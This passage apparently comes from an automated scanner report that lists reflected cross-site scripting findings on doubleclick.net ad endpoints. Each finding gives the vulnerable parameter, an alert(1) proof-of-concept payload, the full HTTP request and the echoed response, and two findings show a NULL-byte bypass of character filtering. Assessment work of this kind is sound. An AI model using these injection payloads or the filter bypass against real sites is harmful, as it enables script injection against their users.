k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439373b99"-alert(1)-"22b3257a069&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindo
...[SNIP]...

4.118. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3db2"-alert(1)-"c4dc2695016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602e3db2"-alert(1)-"c4dc2695016&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:11 GMT
Expires: Sat, 29 Jan 2011 05:20:11 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602e3db2"-alert(1)-"c4dc2695016&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess =
...[SNIP]...

4.119. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f28b5'-alert(1)-'fba16b567ae was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602f28b5'-alert(1)-'fba16b567ae&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602f28b5'-alert(1)-'fba16b567ae&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.120. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f182e'-alert(1)-'844d4f6d01f was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8f182e'-alert(1)-'844d4f6d01f&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8f182e'-alert(1)-'844d4f6d01f&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.121. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f12"-alert(1)-"83d92f4e7a4 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=865f12"-alert(1)-"83d92f4e7a4&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=865f12"-alert(1)-"83d92f4e7a4&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "fals
...[SNIP]...

4.122. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %004bbf5"-alert(1)-"260e69958b was submitted in the c parameter. This input was echoed as 4bbf5"-alert(1)-"260e69958b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0%004bbf5"-alert(1)-"260e69958b&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6231
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0%004bbf5"-alert(1)-"260e69958b&tp=8&forced_click=http://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptac
...[SNIP]...

4.123. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 364be'-alert(1)-'2ba227b9740 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0364be'-alert(1)-'2ba227b9740&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 496
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/7e/%2a/q;235157859;1-0;0;59025920;4307-300/250;40327153/40344940/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0364be'-alert(1)-'2ba227b9740&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx">
...[SNIP]...

4.124. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef88f'-alert(1)-'362fa6d4daf was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=ef88f'-alert(1)-'362fa6d4daf HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6223
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:26 GMT
Expires: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=ef88f'-alert(1)-'362fa6d4dafhttp://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.125. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0b1"-alert(1)-"82733519075 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6a0b1"-alert(1)-"82733519075&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6237
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:17 GMT
Expires: Sat, 29 Jan 2011 05:20:17 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e/f/7d/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6a0b1"-alert(1)-"82733519075&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
...[SNIP]...

4.126. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb052'-alert(1)-'fcd59c06eba was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6fb052'-alert(1)-'fcd59c06eba&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:18 GMT
Expires: Sat, 29 Jan 2011 05:20:18 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6fb052'-alert(1)-'fcd59c06eba&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.127. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa157"-alert(1)-"44321d95d77 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438aa157"-alert(1)-"44321d95d77&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438aa157"-alert(1)-"44321d95d77&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

4.128. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb80'-alert(1)-'81af67c145b was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=5194384cb80'-alert(1)-'81af67c145b&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=5194384cb80'-alert(1)-'81af67c145b&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.129. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9db7'-alert(1)-'c5b33736d34 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393d9db7'-alert(1)-'c5b33736d34&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 496
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/7e/%2a/q;235157859;1-0;0;59025920;4307-300/250;40327153/40344940/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393d9db7'-alert(1)-'c5b33736d34&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx">
...[SNIP]...

4.130. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158a9'-alert(1)-'deb9cc6efed was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313158a9'-alert(1)-'deb9cc6efed&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3Bh%3Dv8/3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313158a9'-alert(1)-'deb9cc6efed&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.131. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5648"-alert(1)-"e253305c7e0 was submitted in the tp parameter. This input was echoed as a5648"-alert(1)-"e253305c7e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8%00a5648"-alert(1)-"e253305c7e0&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6235
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8%00a5648"-alert(1)-"e253305c7e0&forced_click=http://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

4.132. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B5189085.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4b0'-alert(1)-'02f22d66f55 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=89e4b0'-alert(1)-'02f22d66f55&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:24 GMT
Expires: Sat, 29 Jan 2011 05:20:24 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=89e4b0'-alert(1)-'02f22d66f55&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.133. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19073'-alert(1)-'0b09bb6dee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.rev_bostonherald/?19073'-alert(1)-'0b09bb6dee0=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 350
Cache-Control: no-cache
Pragma: no-cache
